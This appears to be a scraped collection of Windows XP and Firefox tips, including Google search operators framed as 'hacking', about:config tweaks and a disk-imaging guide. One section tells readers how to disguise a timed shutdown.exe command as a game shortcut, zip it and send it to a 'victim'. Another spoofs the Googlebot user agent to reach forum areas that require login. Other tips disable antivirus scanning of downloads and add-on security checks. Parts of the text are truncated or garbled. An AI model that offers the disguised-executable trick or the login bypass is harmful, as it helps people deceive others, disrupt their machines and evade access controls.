Change Your Logon Screen Into Vista

Have you ever wondered how to change the default Windows XP logon screen? Today I got the crazy idea to figure out how to make it look like Windows Vista instead, so I'm writing that up for you.

You'll have to download and install the free LogonStudio application and make sure that it is set as the default logon handler, which is easy since it will prompt you when you first open it.

The three default welcome screens aren't very impressive, but there's a ton of great ones on the wincustomize site, including the Vista one you see here.

image

Next, download and open the Windows Vista Ultimate Logon screen for XP, and select it in LogonStudio as shown above. Once you hit the Apply button, you'll see your Vista-style logon screen for XP:

image

Note that this will not work if you are logging into a domain, or if you use the classic style logon with Ctrl+Alt+Del. There's a way to customize that background image, which I'll cover in another article.

Download LogonStudio for XP from stardock.com

Google Tricks

GOOGLE is the biggest search engine on the entire world wide web. Everyone have used it at least once, but not everyone knows the true power of Google search. Generally we use Google for getting info about a product , for finding cheap cellphones/laptops/deals etc. or for finding some pr0n pictures/movies etc.

Some great hackers tried their hands on Google for finding some juicy info , they start using Google queries for hacking . .. ya its true.

Google hacking is mainly used by hackers to get information related to computer security. In its malicious format it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities as well as locate private, sensitive information about others , such as credit card numbers, social security numbers, and passwords.

Basic Google search is simple by putting up some keyword in Google search page and press enter. But hackers try to do something more than that, for this they use some extra operators (advance Google search). Although hacking by using search engine is mainly done on Google but many hacks are valid for other search engines like MSN Search and Yahoo too.

Google Hacking Involves Google operators to locate specific strings of text within search results. Following are some advance operators for Google search.

cache: If you include other words in the query, Google will highlight those words within the cached document. For instance, [cache:
Code:
www.google.com
web] will show the cached content with the word “web” highlighted.
This functionality is also accessible by clicking on the “Cached” link on Google’s main results page. The query [cache:] will show the version of the web page that Google has in its cache. For instance, [cache:
Code:
www.Google.com
will show Google’s cache of the Google homepage. Note there can be no space between the “cache:” and the web page url.

link: The query [link:] will list web pages that have links to the specified web page. For instance, [link:
Code:
www.google.com
will list web pages that have links pointing to the Google homepage. Note there can be no space between the “link:” and the web page url.
This functionality is also accessible from the Advanced Search page, under Page Specific Search > Links.

related: The query [related:] will list web pages that are “similar” to a specified web page. For instance, [related:
Code:
www.google.com
will list web pages that are similar to the Google homepage. Note there can be no space between the “related:” and the web page url.

This functionality is also accessible by clicking on the “Similar Pages” link on Google’s main results page, and from the Advanced Search page, under Page Specific Search > Similar.
info: The query [info:] will present some information that Google has about that web page. For instance, [info:
Code:
www.google.com
will show information about the Google homepage. Note there can be no space between the “info:” and the web page url. This functionality is also accessible by typing the web page url directly into a Google search box.

define: The query [define:] will provide a definition of the words you enter

after it, gathered from various online sources. The definition will be for the entire phrase entered (i.e., it will include all the words in the exact order you typed them).

stocks: If you begin a query with the [stocks:] operator, Google will treat the rest of the query terms as stock ticker symbols, and will link to a page showing stock information for those symbols. For instance, [stocks: intc yhoo] will show information about Intel and Yahoo. (Note you must type the ticker symbols, not the company name.) This functionality is also available if you search just on the stock symbols (e.g. [ intc yhoo ]) and then click on the “Show stock quotes” link on the results page.

site: If you include [site:] in your query, Google will restrict the results to those websites in the given domain. For instance, [help site:
Code:
www.google.com
will find pages about help within
Code:
www.google.com
. [help site:com] will find pages about help within .com urls. Note there can be no space between the “site:” and the domain.This functionality is also available through Advanced Search page, under

allintitle: If you start a query with [allintitle:], Google will restrict the results to those with all of the query words in the title. For instance, [allintitle: google search] will return only documents that have both “google” and “search” in the title. This functionality is also available through Advanced Search page, under

intitle: If you include [intitle:] in your query, Google will restrict the results to documents containing that word in the title. For instance, [intitle:google search] will return documents that mention the word “google” in their title, and mention the word “search” anywhere in the document (title or no). Note there can be no space between the “intitle:” and the following word.
Putting [intitle:] in front of every word in your query is equivalent to putting [allintitle:] at the front of your query: [intitle:google intitle:search] is the same as [allintitle: google search].

allinurl: If you start a query with [allinurl:], Google will restrict the results to those with all of the query words in the url. For instance, [allinurl: google search] will return only documents that have both “google” and “search” in the url. Note that [allinurl:] works on words, not url components. In particular, it ignores punctuation. Thus, [allinurl: foo/bar] will restrict the results to page with the words “foo” and “bar” in the url, but won’t require that they be separated by a slash within that url, that they be adjacent, or that they be in that particular word order. There is currently no way to enforce these constraints. This functionality is also available through Advanced Search page, under

Make Orkut Free From Google Ads

Internet is a vast place for people like us who like to surf from one site to another. Social networking sites are just one more place to surf. These sites such as Orkut, MySpace, Hi5 or FaceBook have penetrated so deep into our lives that the moment we start surfing, we logon to these sites first.

Orkut is one of social networking sites owned by Google. Though it's only popular in Brazil and India, but for some reason, Alexa says Orkut is the 9th most visited site in Ireland.

One thing which I have been annoyed of lately is the Google Ads shown by Google in the community homepage as this one.

But applying my hack you can free yourself from these ads

Hack

First and foremost requirement of this hack is that you should be using Mozilla Firefox. This Open Source piece of software is best software I've ever came across.

Fire your Firefox and proceed to this addon link -> AdBlock Plus . According to their developers

"Ever been annoyed by all those ads and banners on the internet that often take longer to download than everything else on the page? Install Adblock Plus now and get rid of them."

Click "Add to Firefox" and install the addon for your browser. Next step is restart your browser. Now everyone must be thinking how this can be called a hack when it comes to just installing a simple addon. Wait!!!

Whenever you want to block an ad, just right click it and click "AdBlock Image". But clicking all the ads inside Orkut is an impossible task because for that you have to search each and every community. But ever noticed that what is common with all these ads, their command format is

http://www.orkut.co.in/AdsIframe.aspx?xxxxxxx

This page is responsible for generating the Adsense code and placement of ads on pages.

Follow the next step and block all the Google ads. Right click any Google ads and click "Adblock Image". A box will popup and just enter "http://www.orkut.co.in/AdsIframe.aspx"
Bingo !!! You will blocked that ADS Page

Firefox About:Config Tweaks

Here’s a small course on hows to use About:Config, as it will help you in making the adjustments for tweaking your FIREFOX.3.

1. Start Firefox.
2. Type about:config into the address bar and press Enter. When you’re presented with the warning screen click the I’ll be careful, I promise button:

You should see a long list of hidden settings that look meaningless and confusingly complicated

4. Now comes the main part of actually modifying and/or creating new values:

* If it is told that the key already exists then you can type the name of the preference in the Filter box, and it will instantly show only the matching results. Once you find the preference you’re looking for just double-click on it to change the value.

* If it is told you that the key does not exist you will need to create a new value manually. Just right-click on any entry on the about:config screen, go to the New menu, and choose either string, integer, or boolean depending on what the demand is.

5.You may need to restart your browser for some of the options to take effect.

6. Now if you want to go back to the original state. Any of the preferences can be reset to their default values in the
event that something doesn’t work the way you expected it to. This can be done by right-clicking on the particular option in about:config, and selecting Reset. Values that have been changed at one point or another will appear in bold text they have been reset they should no longer be bold.

Session Restore Saving Frequency

Whenever Firefox crashes it will try to restore all of your open tabs to the way they were. This has come in handy several times for me before, but sometimes I notice that it isn’t able to restore all of my tabs for me.

That’s because Firefox, by default, only saves the session restore data every 10 seconds, but you can configure that time interval to whatever you would like.

* Name: browser.sessionstore.interval
* Preference Needs to be Created: No
* Preference Type: Integer
* Default Value: 10000
* Possible values:
o The number of milliseconds between session restore saving. For example, entering in 1000 would cause the session restore data to be saved every 1 second, whereas a value of 20000 would make it happen every 20 seconds.

Increase the Number of Results in the Address Bar

By default the address bar will always show 12 results in the drop-down menu, which is probably more than enough for most people. If you prefer to see more (or fewer) results you can alter how many items can be displayed with the following setting:

* Name: browser.urlbar.maxRichResults
* Preference Needs to be Created: No
* Preference Type: Integer
* Default Value: 12
* Possible values:
o The number of results you would like to appear in the address bar drop-down menu.

Enable Advanced Color Profile Support

Those of you that are photo enthusiasts might enjoy the fact that Firefox has advanced color profile capabilities. It’s not enabled by default because it can cause a 10-15% performance hit for the browser, but if image quality is that important to you this might be something you want to enable. Here’s a great comparison between Firefox 2 and Firefox 3 (with the color profile turned on)

* Name: gfx.color_management.enabled
* Preference Needs to be Created: No
* Preference Type: Boolean
* Default Value: False
* Possible values:
o True - Enables color profile support so that the colors appear richer
o False - Disables color profile support so that you have better performance

Get Notified when a Website Redirects You

Some websites redirect users from one address to another, and it often happens so quickly that it can be difficult to catch. This could be a bad thing because the site could try to redirect you to a malicious or inappropriate site, but you can setup Firefox 3 to alert you when things like this happen. To enable this feature open up the Firefox preferences, switch to the Advanced -> General tab, and then check the box labeled Warn me when web sites try to redirect or reload the page. Then whenever a site tries to redirect you from one page to another you should see a warning bar.

Disable Antivirus Scanning

For Windows users when Firefox 3 finishes downloading a file it will initiate a virus scan using any antivirus application that the user has installed on the computer. If you download a lot of files (especially large files) this can become a bottleneck for you as you wait for each file to be scanned, especially when many antivirus applications will automatically scan all incoming files. That means each file you download might get scanned twice.

By jumping into the about:config you can enable or disable this setting at your leisure:

* Name: browser.download.manager.scanWhenDone
* Preference Needs to be Created: No
* Preference Type: Boolean
* Default Value: True
* Possible values:
o True - Scans each download with the installed antivirus application
o False - Does not scan each download with the installed antivirus application.

WORK OLD ADD ONS IN BETA 3

Right-click anywhere. Choose New>Boolean.
Make the name of your new config value
extensions.checkCompatibility and set it to false.

Make another new boolean pair called
extensions.checkUpdateSecurity and set the value to false.
Restart Firefox.

Make Your Friend's PC Shutdown

Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim’s computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things.

1) Right click on desk top, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"

You can change "this is a virus" to anything you would like that’s just the message that will appear.
The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

My advice would be to rename it something like.... wicked game. Depends on the victim’s age and sex. But make sure you call it something good or the victim won't bother clicking on it.
After you have given it a name click on finish.
You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it.
It is also advised you change the icon to something different.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don’t forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone you...... dislike greatly.

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL
Ok go to start, run, type cmd, then in cmd type: shutdown -a

Some Google Tricks / Hacks

Everyone knows google in the security sector...and what a powerful tool it is,just by entering certain search strings you can gain a vast amount of knowledgeand information of your chosen target...often revealing sensitive data...thisis all down to badly configured systems...brought on by sloppy administrationallowing directory indexing and accessing , password files , log entrys ,files , paths ,etc , etc
Search Tips
so how do we start ?
the common search inputs below will give you an idea...for instance if youwant to search for the an index of "root"
in the search box put in exactly as you see it below

Goto Restricted Areas In Forums Without Loggin In

usin this customization u can go into forum sections which need user login..

Note this only works on websitez which allow "searching" bots to looking @ forum.

So sometimes u r to lazy to login or u forget password and u quick need some information.

So good way is faking UA <- User Agent I will show u example of firefox Type in URL bar following: about:config then u should see alot of options which can be changed 1cm down u will see "Filter:" Type in box "useranget" without quotes We need to change just general.useragent.extra.firefox Deafult is Firefox x.x.x or something like that^^ So how to bypass login on that websites(also on h4cky0u)? just double click & type in that field Code: Select all Googlebot/2.X (http://www.googlebot.com/bot.html)

So websites will think u r google bot and allow u searching on website without login :)

WinXP Installation Made Very Simple

this helps to install XP wit all ur fav prgms in less than 10 mins...

Yeah if u r tired up installin win xp n enterin all those details lyk serial no, location timing etc etc,,,
n after that installation of diff applications,,,this topic z just for ya...

here i'm goin to giv u a idea of makin these things a lot more simple..

download
Acronis True image n Acronis Disk Director...
n ultra iso
n make it a full version i prefer buyin it coz it worth d cost..

then install it..n make a bk up of the system drive ie the drive on which the winxp is installd using acronis true image home

then mk a bootable cd/dvd image using acronis disk director.
PS:select all the sections when it z askd.
ie
Acronis True image home
Disk director full n safe
Drive cleanser..

PS::create the image only do not write d DVD nw..

nw open the ultra iso
in it open the created boot image file v jst made usin disk director..
there ll b folder with some name. on the right hand side..

nw drag n drop the file v bkd up earlier using true image to this area...do not put it in the folder of the compilation..

nw save the whole image..u should see the image file as bootable at the top left corner of ultra iso..

nw write the image usin any dvd burner programs..do not write the dvd as image.
if u r usin nero then th nero express..
n then select image,project,copy in it select the iso file v made usin ultra iso...
burn it..

nw the diff part is over,,,

nw if u need to restore the partition or mk a new installation..jst put this dvd in d drive n reboot the system..

then u'll see options for true image n disk director..
so first take the disk director.
in it format the partition u want to install the win xp..
then commit d changes n then exit
the system ll reboot n then select true image.
in it select restore..
then browse to the bk file which z in the DVD..
its done..it ll tk atmost 9 mins n then it ll be ok..
restart the system..

here the main adv is that..u dont hv to install the applications drivers games etc etc explicitly..it all ll b done in jst abt 10 mins...

PS::::::::
* mk sure that the s/m hs all the applications drivers games etc etc u need before bakin up...

*all d programs shld b instlld in the same drive in which d win xp z installd.

*the bk up procedure consists f d followin steps...

slect bk up in acronis true image
then nxt-->my computer-->disk n partitions-->drive c(win xp installd partition)-->nxt-->full bk u-->select d place 4 bk up..
*do not select d partition of which the nkin up z done..

*nw the restore procedure z done....as follows..
select it frm dvd next-->restore disks or part..-->click the drive first-->select the target partions..-->nxt-->Active-->nxt-->nxt-->

yes i wnt to restor another part-->select MBR-->select the hd on which the os is to be installd.

How To Change Thumbnail Size And Quality

If any of you out there like to use the thumbnail view, especially for browsing through photos and images, it can become a bit of a drain on your system. It is possible to lower the thumbnail size and quality by editing the following registry keys.

Open the registry and navigate to :

HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer

Create a new DWORD value called ThumbnailSize, and set the value between 32 and 256.

And/or create another DWORD value called ThumbnailQuality, and set the value between 50 and 100.

Key Details :

USER Key: [HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer]
Value Name: ThumbnailSize
Data Type: REG_DWORD (DWORD Value)
Data Value: 32 - 256
